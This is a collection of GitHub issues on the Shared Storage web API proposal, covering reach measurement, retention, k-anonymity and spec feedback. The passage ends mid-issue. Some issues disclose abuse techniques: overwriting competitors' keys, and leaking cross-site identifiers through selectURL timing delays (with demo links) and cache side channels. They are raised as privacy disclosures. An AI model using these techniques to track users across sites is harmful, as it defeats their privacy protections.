Given that Reach is a fundamental metric of brand advertising and that accurate assessment of ad campaign efficiency requires accurate and flexible reach measurement, we would like to request that shared storage API extends its functionality to support advanced scenarios of reach measurement in a privacy safe manner. In particular, it is important that the system scales to thousands of advertisers pulling interactive exploratory reports on the ongoing and finished campaigns daily. We believe high utility for Reach advertisers should be achievable with reasonable privacy budget settings.

Privacy Sandbox is critical for maintaining high quality of reach measurement. In the absence of features of the privacy sandbox discussed below the reach modeling could use domain partitioned cookies as a signal, however lack of cross-domain deduplication signal poses a huge challenge for unique user count deduplication. It is unclear when and if technology of sufficient quality using domain partitioned cookies can be developed. Furthermore development of such technology could potentially pose an extra risk on user privacy, as accurate cross-domain deduplication done in the clear context (compared to on-device nature of Chrome Privacy Sandbox) may have negative effects on user privacy.

Specifically the following functionality is critical to make sure that important reach reporting scenarios can function with high quality while being powered by the shared storage.

Availability of the secure report in the context of the event. The explainer states:

The report contents (e.g. key, value) are encrypted and sent after a delay.

This means that users of the system have to pre-define reporting segments before the ads are served, however, modern advertising reach reporting and optimization use cases enable interactive slicing of the traffic on various criteria directly linked to the event context, such as reporting time window, device type, time of day, location, etc.

Additionally, encoding all of these options into the key rather than creating reports on-demand would put unnecessary strain on the privacy budgets.

On the other hand, it should be possible to add sufficient levels of noise on the final aggregates on demand, to ensure high standards of privacy protection without sacrificing the flexibility of reach slicing without requiring delayed reporting, which further limits the freshness of reporting capabilities.

Therefore we would request you to kindly consider the following approach:

Allow the aggregated report entity to be available immediately in the page javascript context so that at a later time the ad tech would have an option to upload a batch of the reports for further aggregation. Since aggregated reports are returned unconditionally for each impression, its arrival does not provide any extra information for ad-tech.

Since the final aggregated report would have a differentially private noise and appropriate privacy budget tracking, this option would maintain high privacy protection standards. Meanwhile it would keep the reach slicing flexibility that modern reach reporting flows rely upon now.

Alternatively the report could still be returned with a delay, but be accompanied with an event level identifier that would allow it to be joined to the original event.

Enable count_distinct secure aggregation function. So far the explainer only mentions sendHistogramReport function for sending the reports.

The histogram report appears to be insufficient for implementation of Virtual People technology in the privacy sandbox. This technology is used by Google and the Cross-Media Measurement project.

Aggregating Histogram with per-bucket noise is insufficient, because each browser gets mapped to a virtual person and the count of virtual people rather than browsers is important. Histogram is good for counting unique browsers by some partitions, but is incapable of counting unique virtual people.

IAB Audience reach measurement guidelines page 4 reads: "deriving unduplicated audience reach people-based measures from digital activity and other research is the most difficult of the metrics however, it is also inherently the most valuable to users of measurement data."

Providing the count_distinct aggregation function would be enabling a natural implementation of the Virtual People technology and proper differential privacy noise is capable of ensuring high privacy protection standards.

The count_distinct can be implemented for the buckets of the histogram, so that no new type of report would be required.

To support demographic composition and frequency scenario it should be possible to filter histogram buckets based on index and on the range of the value.

Enable pre-aggregation of the reports for further quick combination at serving time with low latency.

Interactive reports are critical to an advertiser's ability to understand the reach of the campaigns that they are running.

To enable interactive exploration the aggregation API would need to provide the ability to pre-aggregate histograms and return an intermediate data structure result encrypted. Then such intermediate reports could be pre-aggregated for atomic reporting units and reach for a collection of reporting units extracted at real time when report is required.

Enable combining reports with first party reports.

Campaigns could be running with some events served on first-party sites, while others on 3rd parties. One way to get deduplicated reach of such campaign accurately would be to let the secure aggregation server to digest histogram that is constructed by the ad-tech in the clear, along with pre-aggregated encrypted histogram.

Secure aggregation should be scaling to impression-level reports.

Each ad impression would be emitting a reach report and secure-aggregation infrastructure should be scalable to large volumes to make sure that the reach use-case is supported.

Again, thank you very much for providing this flexible privacy safe api and thank you very much for your consideration.

Document considerations relatively to leaks via Spectre.

Website can read their's process memory via Spectre with various bandwidth depending on crossOriginIsolation, platforms and flags.
See: https://leaky.page/

It would be nice documenting what are the measure taken to prevent communication in between:

The worklet that can read the unpartitioned storage, but have no capabilities to exfiltrate the data, outside of the two controlled ones (opaque URLs, aggregated reporting API)
The document/worker that can't read the unpartitioned storage, but has the capabilities to exfiltrate the data (network access).

Disabling Shared Storage through Privacy Sandbox Settings

We have filed a bug to add a setting in the Chrome Privacy Sandbox Settings (chrome://settings/privacySandbox) that would toggle whether Shared Storage was enabled or not, so that a user could disable it. But we haven't worked out exactly what it means for Shared Storage to be disabled.

Does this mean that the API is not available? Or that the API is available, but that all promises are rejected? Or that the API is available, promises are resolved and rejected almost as usual, with the caveat that resolved promises are dummy/null values undetectable to the caller?

In any case, when Shared Storage is disabled, we should not actually store data in or read data from the backend database. Probably this database shouldn't exist anymore and should be wiped at the moment that the user disables Shared Storage. We already have prototype code for clearing the Shared Storage database based on user initiation through Site Settings.

If at some point the user re-enables Shared Storage, then the database can be re-created.

Needs synchronized

Synchronization

`set`/`append` side channel implementation mitigations

Given that set and append are synchronous, they could create a side channel exposing if a value is currently set or not, at least if naively implemented. (e.g. if setting a value takes different times based on its presence or lack-there-of)
I think it's worthwhile to point that out (e.g. in a note), to ensure implementations are performing the actual setting/appending in an async fashion.

Can a context origin add multiple scripts modules like other worklets? If so, can they add them in parallel?

Some origins may want to split the Shared Storage worklet operations that they want to register into multiple module files.

Does the current design allow for calling window.sharedStorage.worklet.addModule multiple times in the same context, one for each different module? If so, do the calls get fullfilled in series or in parallel?

If the latter, are there any potential race conditions that we need to consider?

per-entry retention with 'touch' to extend expiration date

The retention policy in the explainer mentioned that data will be cleared after 30 days after creation, on a per-origin basis. This is not ideal for use cases that needs a persistent storage for longer than 30 days. I would suggest two changes:

Instead of per-origin retention, we should make the retention per-entry or per-key. Each origin can store many key/values for different use cases. Those key/value can be written at different time and accessed at different cadences. It doesn't make sense to make all entries to share the same retention as the very first entry which created the database. Imagine that you want to write a new entry to a database of an origin that was created 29 days ago. Even knowing that this new entry has only 1-day lifetime (you can learn it from the worklet), there is no way to extend the databased's expiration date.
'touch' an existing entry with set(, { ignoreIfPresent: true }) (maybe even with sharedStorage.get()) should extend the expiration date of that entry for another 30 days. This will make sure we only clear the entries that are not actively accessed.

URL parser does not return whether a URL was valid

I assume you mean to check for failure. If you actually meant validity you need something else. (Note that implementations sometimes confuse "validity" with "can parse" so you can't really rely on them.)

Transparency of data sources versus data usage

I'm adding this comment in response to the conversation today in the Improving Web Advertising BG about transparency for users. I support being as transparent as possible with users - and also giving them a way to act upon the information given to them. However, I think we should consider whether the transparency would be more useful if it was more about the source of the data than it is about how it's used. In other words, more "data was collected about you when you visited site X" and less trying to say "you got this ad because you visited site X". My reason is that the logic for how particular data is used isn't necessarily going to be straight forward enough to make much sense on the surface.

For example, I know of an ad campaign for probiotic supplements that was being targeted to people who bought breakfast cereals, soups, canned fruits, or non-diet sodas. Telling a user they're receiving an ad for probiotics because they bought a bottle of coke or lucky charms might not make much sense to them. The logic, btw, is that people who eat foods with high-fructose corn syrup in them likely have a greater need for probiotics. When things like KNN clustering is used, the logic can seem even more mysterious - since it's more about correlation than causation.

In that case, it might be more useful to users if this type of disclosure followed what Amazon does with their recommendations. On the recommendations page, they don't tell you why a particular product is being listed (but you can stop the item from being recommended). Instead, they let you improve the recommendations by letting you decide which products should be used or not. That might be a better user experience than trying to tell users you were recommended this movie because you bought this particular shirt last month.

Anyway, just something to consider.

A/B experiments on contextual ads or a mix of interest-based and contextual ads

Hi,

My understanding is that FLEDGE and TURTLEDOVE include the support of contextually-targeted ads, that do not need to be rendered in a fenced frame.

A given ad campaign could then be running on contextual signals only, or on both interest-based (TURTLEDOVE/FLEDGE) and contextual data, depending on the result of each ad request. Doing A/B testing on these types of campaigns is an important use case.

How could these use cases be supported by Shared Storage, without having to render contextual ads in a fenced frame?

Interaction between sharedStorage selectURL and runAdAuction

The Protected Audience API (aka Fledge) runAdAuction call returns null or is opaque. Similarly the selectURL call response is opaque, with both intended to be rendered in a fenced frame. Unfortunately, using both APIs together seems impractical.

Consider the frequency capping use-case. Note first that the ATPs involved need to decide ahead of time that they want to use the APIs, without knowing whether the user has any relevant interest groups or any relevant frequency capping data in sharedStorage. The outputs of the two calls correspond to ads with different bids. Since the outputs are opaque, it is not possible in general to know how the bids compare, or which opaque output should be preferred. It may be possible to know or predict in some cases; however this seems like a significant gap.

Should it be possible to feed the output of one API into the other in a way that would make selecting based on the maximum bid possible?

Proposal: runURLSelectionOperation() URLs should be k-anonymous

runURLSelectionOperation() allows the caller to choose arbitrary URLs to put into the resulting Fenced Frame. Those urls might include 1p identifiers. Which would then mean the fenced frame has a 1p identifier plus a few bits of cross-site data (from the selection operation). If the Fenced Frame has unrestricted network access, then the Fenced Frame can trivially leak the combination of the 1p identifier and those few bits of information.

So, either we don't allow the FF (fenced frame) to have unrestricted network access, or we make sure that the input data to the fenced frame isn't 1p identifying. It seems like it might be easier to make the data not be user identifying, and an approach for that would be to make sure the input is k-anonymous, as is done for FLEDGE.

Note that the notion of using k-anonymity for input urls is also discussed #14.

Bad Actor Attacks

There are lots of ways that this API can be abused by bad actors or by competitors. This is more general that the specific issues identified in #2.

The clear() call is very destructive, because it clears all keys for all domains; a site should not be able to clear the keys registered by all other sites. In general this should only be initiated by the user themselves when the user wants to do the equivalent of clearing all third-party cookies. You could modify the API to require the add() and update() calls to include a domain. Clear() would also require a domain and only clear keys associated with that domain. This doesn't prevent a company from deleting its competitor's keys, but it at least makes it so that someone trying to clear their own keys doesn't unintentionally clear those of others.

Today, a domain cannot view/set/modify/delete the cookies of its competitors, because it does not have access to these third-party cookies. However, with this API, anybody can set/modify/delete any keys that they desire. For example, a company can mess with its competitors A/B tests simply by calling
sharedStorage.set("competitor key", non-random-value, {ignoreIfPresent: false})
With this they can assign everyone to the A side of the test or randomly switch them every time they visit a site running their code, invalidating their competitor's A/B testing.
This attack could be made more difficult if the set() call supported an option, noUpdates, which if true means that the key, once set, can never be modified. If the competitor sets the value before the owning company, they may still skew the results, but they will not be able to break any test where the user has already been assigned a value.

Another option for the A/B use case would be to only support setting the seed within the SelectURLOperation() call and require that all URLs passed to the call share the same domain. Then the seed can be tied only to that domain and only available for use in future SelectURLOperation calls for that same domain.

What's the standards track for this?

I just had a read through of the explainer, which standards group will it be discussed in? What’s the track for it to be discussed in the open & receive feedback from the wider web creator and browser community?

Delete exported custom anchors

The <pre class="anchors"> section is huge and includes lots of terms whose <dfn> includes data-export. (e.g. https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object, https://html.spec.whatwg.org/multipage/nav-history-apis.html#window-bc, https://url.spec.whatwg.org/#concept-url-origin) You should delete those because having a custom anchor for a term prevents the term from following moves in the source document.

For non-exported terms in web specs, it's best to file an issue or PR asking to export the term. Sometimes the editor will point out a better way to integrate with their spec.

Guarantees and ordering of asynchronous API methods

Our API surface consists of asynchronous methods. Their behavior may lead to race conditions if developers are not fully aware of what guarantees, if any, can be made about how they work.

What kinds of things can be said about the following situations, for example?

What happens if runOperation is called after runOperation? Do they run in series? parallel? Are they guaranteed to run in the order they were called in?
If I call set, and then call runOperation on the next line, am I guaranteed that the set will complete before the next read operation happens in the runOperation?

Removing max key count, max key length, and max value length in favor of max db size

Since shared storage is cross-site data, just knowing the size of your origin's shared storage database could leak significant information. Therefore, Shared Storage is not quota managed, and the size of the origin's database is not web exposed.

Because it's not quota managed, we've put a cap on the size of each origin's shared storage database. But we enforced that cap by limiting the key and value lengths, and the number of possible keys. In retrospect that seems overly constraining to me, when we could instead just have a single size limit for the origin that we enforce, allowing developers to use that space as they see fit.

Any thoughts or comments on making such a change? I don't have anyone asking for this change right now so it's not high priority, but would be interested to hear from folks.

Cross-tab communication via events

So recently our team got hit by the Storage Partitioning flag rollout in the latest Chrome versions, which broke our mechanism of cross tab communication via Local Storage events.
We have a setup where site a.example.com embeds an iframe from site b.example.com. We have a mechanism where user action on site a.example.com opens a new browser tab in the b.example.com domain. Previously we were relying on Local Storage events for communication between those two tabs, but now, due to storage partitioning, it's no longer possible.
It seems that Shared Storage is designed to have secured cross-site unpartitioned storage, but searching through documentation I haven't found if we are able to use some like Storage Events with Shared Storage. Does it sound like Shared Storage is capable of helping in my case? Thanks in advance!

iFrame using own local storage

An iFrame that uses its own localstorage, with a source that is different from the domain of the website it is contained, will be blocked by the 2024 third party cookies proposal by chrome, even if the iFrame do not read or use any content of the parent's storage.

My question is, will sharedstorage solve the problem and how?
From what i've understood, the shared storage API (together with fenced frames) allows this particular behaviour between sites and content frames that only requires a private storage for storing data.

Spec: SharedStorageWorkletGlobalScope does not expose sharedStorage

The SharedStorageWorkletGlobalScope IDL should expose a readonly attribute SharedStorage sharedStorage; This might need to be a WorkletSharedStorage -- but we'd need to ensure alignment with the implementation as that currently handles the differences between windows and worklets by using [Exposed=] markers on each individual function

Supporting server-side (e.g. pre-ads-auction) experiments

Hi! I'm really excited to see that this Shared Storage API proposal is trying to create a solution for cross-site experiments. However the current proposal seems best suited for experimenting on within-browser changes, such as additional filtering after an ad network has already delivered an ad. We're strongly interested in enabling user-consistent cross-site server-side experiments, such as controlling whether a new ad format type would even be included in the initial server-side auction, or changing how an ad creative is rendered before it's sent to the browser.

Are there options here to expand this design to better suit server-side experiments (or possibly even experiments with simultaneous client and server-side changes)? There's a very large number of different types of filtering and logic that happens on server-side, so we'd really appreciate a solution that can scale well to a variety of use cases.

If you're uncertain about requirements, here's a few of ours that may be helpful as you think about this:

Experiments are about comparing aggregated metrics across groups of users, we do not need nor care about identifying individuals within the groups. This means we are happy with solutions that are k-anonymous, and we can work with relatively high sizes of k.
We are okay with some level of noise being added to the user consistency. User bucketing signals available on the web today are already somewhat noisy.
Needs to scale to at least O(hundreds) of experiments/groups, but we prefer O(thousands).

As a potential starting point idea for you to consider, if you're able to allow third-parties access to a k-anonymous, random bucket ID that's user-sticky and consistent across sites, this would allow us to run cross-site experiments. Each 3rd party (e.g. the ad network) would want an independent user-to-bucket grouping so they don't influence one another's metrics, and that should also benefit the user by making it harder to identify common users across different 3rd parties. It'd be nice if the number of bucket IDs available to a 3rd party was proportional to the traffic the party receives since anonymity is closely tied to the underlying population - e.g. 1 bit can be identifying if you have 2 users, but it's not identifying if it's evenly split among 1000 users. I haven't fully thought through all the attack vectors and privacy implications here so I imagine this rough idea will need improvement. Please let me know if there's further details you'd like to discuss, and thanks for your time.

Bb

Clarification on Keys/Values

@jkarlin We were talking about this spec internally and realized that a couple of us had different interpretations on what would be allowable within the stored keys and values. I'm under the impression that keys and values can be arbitrary strings, and we can run arbitrary code over those strings to produce values for the Aggregate Reporting API.

For example, let's take as a use case that advertisers wish to understand their sales cycle better, and want to measure the average time from first impression served to conversion. Could we do something like (pardon my pseudo-JS/python mix):

function getTimestamp() { … }
await window.sharedStorage.worklet.addModule("timetoconversion.js");

// At impression time
window.sharedStorage.set("conversion-timestamps", getTimestamp() + "-", {ignoreIfPresent: true});

// At conversion time
window.sharedStorage.append("time-to-conversion", getTimestamp());
await window.sharedStorage.runOperation("time-to-conversion");

With timetoconversion.js containing:

class SendTimeToConversionReportOperation {
    timestamps = await this.sharedStorage.get("conversion-timestamps");
    t1, t2 = timestamps.split("-");
    time = int(t2) - int(t1);

    this.createAndSendAggregatableReport({
      operation: "sum",  // sum all time delays so we can compute an average later
      key: "time-to-conversion",
      value: time
  }
}
registerOperation("time-to-conversion", SendTimeToConversionReportOperation);

Does this make sense? Thanks in advance for any guidance!

Replacing k-anonymity requirement for `selectURL()` with per-page-load entropy bit budgets

We are soliciting feedback on the following proposal:

We propose removing the requirement that input URLs for sharedStorage.selectURL() be k-anonymous.

Given that we currently have event-level reporting, we believe a k-anonymity requirement would be of limited benefit and not worth the associated financial, performance, and utility costs.

Instead, each page load would have two entropy-bit budgets: an overall page budget and a per-origin page budget. These budgets are in addition to and separate from the daily budget for navigation.

Each time selectURL() is called during that page load, log2(num_urls) would be charged to both the overall budget and the per-origin budget for the caller's origin, as long as there is sufficient budget remaining in both. If either budget has insufficient remaining budget, then the default URL is returned for selectURL() and no budget charges are made.

We plan to use 12 bits as the page-load overall budget, and 6 bits as the page-load per-origin budget.

Drive-by feedback

Handling inactive/detached documents

The spec right now unconditionally assumes that a Window's browsing context is non-null: example, example, example, more.

In order to handle the detached frame case:

const win = iframe.contentWindow;
iframe.remove();
win.SharedStorage.set()/append()/foo();

... and not crash, we have to bail-out early from algorithms that should not operate in this case. You can do this by detecting the null browsing context as you are, but then you miss the bf-cache case as well, so your best bet is to try and detect non-fully active documents as described by https://w3ctag.github.io/design-principles/#support-non-fully-active. Here is a good example usage: https://w3c.github.io/permissions/#dom-permissions-query of this.

Nothing defines how the shared storage interface is exposed

At least I don't think anything defines this. The examples in the Introduction show usage of window.sharedStorage, but I don't see the sharedStorage member actually being defined on the Window interface (if I'm just missing it, forgive me). The closes I see is in https://wicg.github.io/shared-storage/#shared-storage-interface which defines that the interfaces are "exposed" on Window, stops short of defining a name and getter. I think you can fix this by adding something similar to https://wicg.github.io/fenced-frame/#window-extension, where we define how the Fence interface is exposed via window.fence. This would clear up the many lines like this:

Let context be WindowSharedStorage's Window's browsing context.

... and this:

Let context be WorkletSharedStorage's SharedStorageWorkletGlobalScope's outside settings's target browsing context.

... which I don't think are 100% right.

(You might even want to consider doing what we (the fenced frame spec people) should probably do, which is make the getter off of Window just return null in the non-fully-active Document case. Then you don't have to keep adding the inactive checks in all of the other individual APIs.)

Indirect member references

Lines like:

Let queue be context’s associated shared storage database queue.

Are a tiny bit confusing since there is no member called "shared storage database queue" on browsing context. It might be better to make this:

Let queue be context’s associated database's shared storage database queue.

Bad promise resolution

This includes both in parallel promise resolution, as well as cross-event loop promise resolution. I noticed that in selectURL(), we resolve indexPromise in an event loop other than the other it was created in, which I don't think is allowed. The closest documentation I found for this is this example in HTML stating that you cannot resolve a promise in parallel, but I think more generally the guidance is you must resolve promises in the event loop that they were created in.

Another example of this is in https://wicg.github.io/shared-storage/#dom-workletsharedstorage-append, where while in parallel, step 8 > step 4 resolves the promise, but I don't think this is valid. This must queue a task to the outer event loop per the previous HTML link I referenced. There may be other examples (delete() seems like one) in your specification where this could be fixed.

Misc

I noticed in https://wicg.github.io/shared-storage/#report-budget, we define a new member on each "top-level traversable". Just as an FYI, this excludes the top-level browsing context inside of a fenced frame. Is that the intention? In Chrome-implementation-speak, HTML's top-level traversable concept is 1:1 with "primary" frame in the browsing context, whereas "traversable navigable" is any main frame, including ones inside fenced frames. Just wanted to call this out to make sure we thought it through since our terminology is not super duper clear heh :/
The https://wicg.github.io/shared-storage/#dom-windowsharedstorage-selecturl algorithm steps seem to be numerically split by the "Issue:" after step 6. Maybe the "Issue:" needs to be indented more?

Clarifying my understanding of the Shared Storage API proposal

Hi! I'm trying to understand how this proposal might work for cross-domain A/B experiments (e.g.trying to enable the same treatment on the same subset of users across 2 different websites). I've described below what my current understanding is of how the Shared Storage API proposal works as well as some questions on parts I'm unsure of. Could you please help clarify any parts I misunderstood?

Shared Storage

Anyone can write to the shared storage but there are limits on who and what content can be read from it.

Question: How do you prevent domains stomping on one another's content? And what prevents a company from reading a different company's content?

Worklets

Websites can also write functions (called "worklets") that Chrome will execute in-browser based on the contents of the shared storage. The worklets can edit the shared storage, trigger the aggregated reporting workflow, or return content in an opaque URL, but not anything beyond that.

E.g. a party could write a unique identifier (called a seed) to the shared storage, and perform different treatment based on a modulus of the identifier. Put otherwise, the user could be assigned to one of N different treatment groups but would be consistently assigned the same treatment.
- It seems like there might be very low limits on N, but it's unclear how N is determined. Further comments show N is expected to stay under 10.
- Question: Why does N need to be so small? Is there room to scale larger if your base population is large enough? While a small number of bits can be identifying if you have a small number of users, it's possible to have large numbers that aren't identifying if there's a large number of users, as long as the numbers are evenly distributed. Given that this proposal already requires aggregated reporting, would it be feasible for someone to run more types of treatment and just wait longer until enough users are in each treatment group to safely generate the aggregate report?
Is there any way to support multiple independent treatments with different user splits? E.g. if one treatment coloured the website background red and another treatment changed the font, could the users be split into these experiments independently such that some arbitrary subset of users might be in both?
Anything the function calls or loads needs to be done via opaque URL. In the long term, everything loadable via opaque URL should be a blob that's downloaded ahead of time and available offline. Put otherwise, visiting this URL wouldn't result in a server call when the user's browser actually accesses it.
- This likely means that the content within this URL should be limited to something that could be executed in browser. Which also means that it can't pass relevant info to the serving call to trigger server-side treatment changes. Thus it doesn't enable running user-consistent A/B experiments that affect server-side behaviour.
"Operations defined by one context are not invokable by any other contexts." -> I'm not sure what this means. Does it mean we couldn't rerun the same treatment on different domains?
Unclear how flexible these functions/worklets are aside from letting you pick between 1 of 5 opaque URLs. Can you actually change behaviour in these functions, or does the behaviour change need to be within the URL? If the former, can you apply different worklets to different situations, so that you get behaviour changes for some situations and URLs for others?

Aggregated Reporting

The only way to get info back about your treatment is sending metrics in aggregate.

Seems like you can write as many metrics as you want as long as it's in key-value pairs, but you can only get aggregate results returned to your servers at some time interval.
Is there any built-in support for splitting the metrics by treatment groups, or do you have to manually write each group to a different metric key?
Will the metrics include confidence intervals?

Leaking more than log_2(|URLs|) bits of data with the selectURL gate

You can delay when the selectURL gate makes a request by delaying when the run function registered in the worklet returns. By doing this you can pass information to a server based on how quickly it receives the request relative to an earlier request, and use those delays to learn what value was stored with the API.

If you make a call to selectURL and only pass in a single URL it will not decrease the privacy budget as it is currently described since the request can only go to that one URL and log_2(1)=0, but delaying the request, based on a stored value, can still allow you to leak data that is not accounted for in the privacy budget. While the obfuscated URL or fenced frame config is returned almost immediately, the actual request can’t be made until the function returns. The simplest case involves either including a hardcoded delay or no delay before returning, although conceptually there is no reason you couldn’t use different lengths of delays to pass more information to the server (e.g., no delay, short delay, long delay) or tailor the delays to the current network conditions.

Below are links to two different websites that include the same third-party HTML in an iframe (light blue) which creates a persistent identifier that is transmitted as delays (hardcoded to be 2 seconds for this example) between requests for each of the fenced frames. The screenshots of the network waterfalls for the two sites are included below.

Website 1: https://anisenoff.github.io/sharedstorage/request.html?q=delay_header
Website 2: https://www.andrew.cmu.edu/user/anisenof/sharedstorage/request.html?q=delay_header

Note: The links above were tested in Chrome version 114.0.5735.90

Furthermore, by allowing the resources to be loaded into iframes it appears to open up the possibility of using caching attacks, to learn what resource was loaded by a call to selectURL on subsequent visits to a site without decrementing the privacy budget, and possibly other side-channel attacks.

Fenced frames APIs specific to shared storage should be specified in this spec

Fenced frames recently got feedback from the TAG that shared storage seemed like an explicit dependency of the fenced frame specification due to some of the shared-storage-specific APIs appearing in that specification:

If fenced frames has the opportunity to ascend to something like the WHATWG before this specification, for example, then the fenced frame feature should probably not normatively include APIs that are specific to this feature. Therefore I think it's best if the bits above were specified in the shared storage spec as extensions of the fenced frame specification.

`set` with `ignoreIfPresent` vs. `append`

The difference between these two methods is not immediately clear to me upon reading through the explainer. It seems worthwhile to point that out.

A/B test experiment and communication with Fledge worklets

Hi,

As discussed Tuesday, It would be great to be able to have this shared storage available in the buyer or seller worklet in fledge (themselves opaque).

Indeed, in the current set up, the ABtest can only be performed once the winner has been chosen (as you can query with only 5 urls who are therefore related to the winning campaign only) .
It is therefore impossible to do bidding ABtest for instance (where you bid more or less , or differently on a given set of users).

This is a very important use case for online advertising.

Many thanks,
Basile

Number of bits for the selectURL output gate

The explainer states that "The chosen URL represents up to log2(num urls) bits of cross-site information", but it's not immediately obvious (to me) why that's the case. Expanding on it (inline in the explainer, or in a separate document) would be appreciated! :)

Broken references in Shared Storage API

While crawling Shared Storage API, the following links to other specifications were detected as pointing to non-existing anchors:

https://html.spec.whatwg.org/multipage/browsers.html#concept-opaque-origin

_{This issue was detected and reported semi-automatically by Strudy based on data collected in webref.}

Question on how much data can be stored in Shared Storage

This would be stored in browser, will there be a restriction on how much data can be stored per partition?

Should the domain of the shared storage script be restricted?

Can A.com load a shared storage worklet from a domain other than A.com? This seems to come down to how much you trust the entities on your page. E.g., if the top frame embeds untrusted script, that untrusted script might create worklets that report bogus aggregate data to poison the site's aggregate data.

Generally, the web does not protect documents from embedding scripts that could do terrible things. Should that same precedent apply here?

Shared Storage use cases within Fenced Frame

Currently, Fenced Frames disallow all Permission policies for privacy reasons.

Shared Storage is going to add its permissions policy as well. The following Shared Storage use cases will benefit from being allowed from inside the Fenced Frame:

A/B Experiments - Shared storage allows for assigning experiment groups to users and selecting between up to 8 different urls to display to a user. The URL selection is done from a javascript worklet, and the selected URL is rendered by a fenced frame. However, to measure the effectiveness of the experiment, the organization needs to be able to send a report to an aggregation service. It is important to send the report from within the fenced frame, and not from within the JS worklet, as orgs will want to confirm the content successfully loaded prior to sending a report, which is particularly important if the content is an ad a brand is paying for.
Multiple, nested url selection calls - while likely a future use case, there is a potential need to allow multiple organizations to utilize shared storage to prevent one entity further upstream (say for example in an ad decision chain) from preventing other organizations from utilizing shared storage (we will need to ensure we are “budgeting” properly for entropy leakage, hence why it is a future/under consideration use case). It is likely that if an SSP uses some information from shared storage to then render a URL within a fenced frame pointing to a DSP, that the DSP would be unable to reference information in its own shared storage to further refine the ad decision.

Enrollment and budgets

How does the per-origin budget mentioned in https://github.com/WICG/shared-storage#short-term-budgets tie to the 'budget' referred in the enrollment which is per-site?

Questions about the explainer on behalf of an ad server

I'm trying to envision how an established ad server could utilize shared storage to implement frequency capping, a/b testing, remarketing, and rotating creatives in a sequence at the user-level. A few questions:

Is the limit of 5 URLs set in stone? For campaigns that select a creative based on a combination of frequency-capping, a/b testing, and remarketing, we can easily run into the 5 URL limit. One of these 5 URLs will be used as a default in case the user does not fit into any of the specified categories. We would like the maximum flexibility possible, while preserving the user’s privacy.
I found this part of the explainer hard to understand:

However, a leak of up to log(n) bits (where n is the size of the list) is possible when the fenced frame is clicked, as a navigation that embeds the selected URL may occur.

Can you describe the idea further?

Will we be getting temporary “Event-level reporting” that FLEDGE currently has (e.g. https://github.com/WICG/turtledove/blob/main/FLEDGE.md#5-event-level-reporting-for-now)?

Support event-level reporting for `selectURL()` in the short term

For utility and adoptability, prior to the deprecation of third-party cookies, we will need to support event-level reporting for sharedStorage.selectURL() in a manner that is roughly equivalent to what the FLEDGE API has implemented in their registerAdBeacon().

We propose updating the urls parameter, which is currently an array of URLs, to an array of dictionaries where the metadata can be omitted, e.g. in the following example:

var opaqueURL = await window.sharedStorage.selectURL(
  "select-url-for-experiment",
  [{url: "blob:https://a.example/123…", report_event: "click", report_url: "https://report.example/1..."},
   {url: "blob:https://b.example/abc…", report_event: "click", report_url: "https://report.example/a..."},
   {url: "blob:https://c.example/789…"}],
  {data: {name: "experimentA"}});

We would then use this metadata to hook up to window.fence.reportEvent().

In the long term, however, we will not be able to support this type of reporting, as it can be used to leak the index simply by using a distinct report_url for each candidate Fenced Frame url.

We welcome feedback on this proposal.

Use of Shared Storage API for ad selection and buyer/seller roles in the ecosystem

Shared Storage API offers interesting primitives that can potentially be useful for selecting ads based on criteria that needs some cross-site information, for example, to enable browser-level frequency capping, while protecting users from tracking across sites. The current proposal includes a selectURL function, which allows an embedded third-party origin to select one of a small number of URLs to render, delegating the choice to a snippet of JavaScript logic running inside an isolated worklet. The feature can help serve ads that are targeted mainly based on contextual, single-site criteria server-side, but need an additional post-filtering step applied based on cross-site knowledge.

That said, the current programmatic ads ecosystem typically involves not one but multiple participants working together to select and serve the best ad. Often, this includes at least a buyer (such as a DSP), who represents an advertiser or an agency, and a seller (such as an SSP), who represents a publisher.

Can there be a practical way to adapt the Shared Storage API and, specifically, its URL selection feature, to the ad selection process that involves the roles of buyers and sellers working together to select the best (for example, highest-paying) ad?

These two roles can translate into different requirements.

Buyers may want to:

Use the Shared Storage API to apply business logic (such as frequency caps enforcement) based on cross-site information on-device, and select a subset of eligible ads from a larger set (likely determined server-side, perhaps, based on contextual or single-site targeting).
Extra credit: adjust bid value for an ad based on cross-site information (e.g., apply bid discounts for subsequent impressions).
Be able to write to the Shared Storage upon rendering their ad.

Sellers may want to:

Let buyers use the Shared Storage API within the context of their origin to select a subset of ads eligible to serve (e.g., meeting campaign frequency caps) from a larger set.
Select a winning ad (for example, top-ranked by its publisher payout) from the set of ads that the buyers’ logic within worklets determined as eligible to be shown to an end user.
Propagate the information buyers may need for running their on-device logic inside worklets with the Storage Access API (for example, campaign frequency caps from the contextual bid responses).

Storage Access API suggests logic operating on cross-site data should run inside isolated worklets to protect from exfiltration. Can the API support multiple worklets orchestrated in a way to support both buyer- and seller-specific URL selection logic, such that the seller logic can (a) select an ad URL to render among the ad URL(s) selected by different buyers and (b) does not have access to any buyers’ origin shared storage?

Note: some ideas here sound similar to FLEDGE and its on-device auction. I’ll raise a separate issue about the relationship between FLEDGE and Shared Storage API for ad selection use cases.

Resetting every 30 days overly restrictive?

In an effort to reduce the scope of joining user ids across sites, Shared Storage will delete an origin's contents 30 days after the first entry is written. This is perhaps overly restrictive, and prohibitive, for our users. For one, outside of the worklet, the caller has no idea how long the data will persist. It may be day 29, and writing a new key on the 29th day will result in it being deleted the next day. But also, there are use cases (such as reach) that will need to extend beyond 30 days.

An alternative proposal is to reduce the scope of joining user ids across sites without further interaction with the origin. This brings it closer to what FLEDGE is doing. That is, if a FLEDGE interest group already exists, and is written to again, its expiration time is reset. We could do the same thing with Shared Storage. If a key is written to (or would be written to if it didn't already exist), its timestamp is reset. This ensures that keys persist for at least 30 days, and can be extended longer so long as the origin sees the user again and updates the value.

Thoughts welcome.

Problem with sharedStorage's described use of k-anonymity

The explainer says:

"""
selectURL() returns a promise that resolves into an opaque URL for the URL selected from urls.

urls is a list of dictionaries, each containing a candidate URL url and optional reporting metadata (a dictionary, with the key being the event type and the value being the reporting URL; identical to FLEDGE's registerAdBeacon() parameter), with a max length of 8.
- The url of the first dictionary in the list is the default URL. This is selected if there is a script error, or if there is not enough budget remaining, or if the selected URL is not yet k-anonymous.
- The selected URL will be checked to see if it is k-anonymous. If it is not, its k-anonymity will be incremented, but the default URL will be returned.
- The reporting metadata will be used in the short-term to allow event-level reporting via window.fence.reportEvent() as described in the FLEDGE explainer.

"""

This design has the following flaw: The default URL is not necessarily k-anonymous and may be used to join first/third-party information. For example:

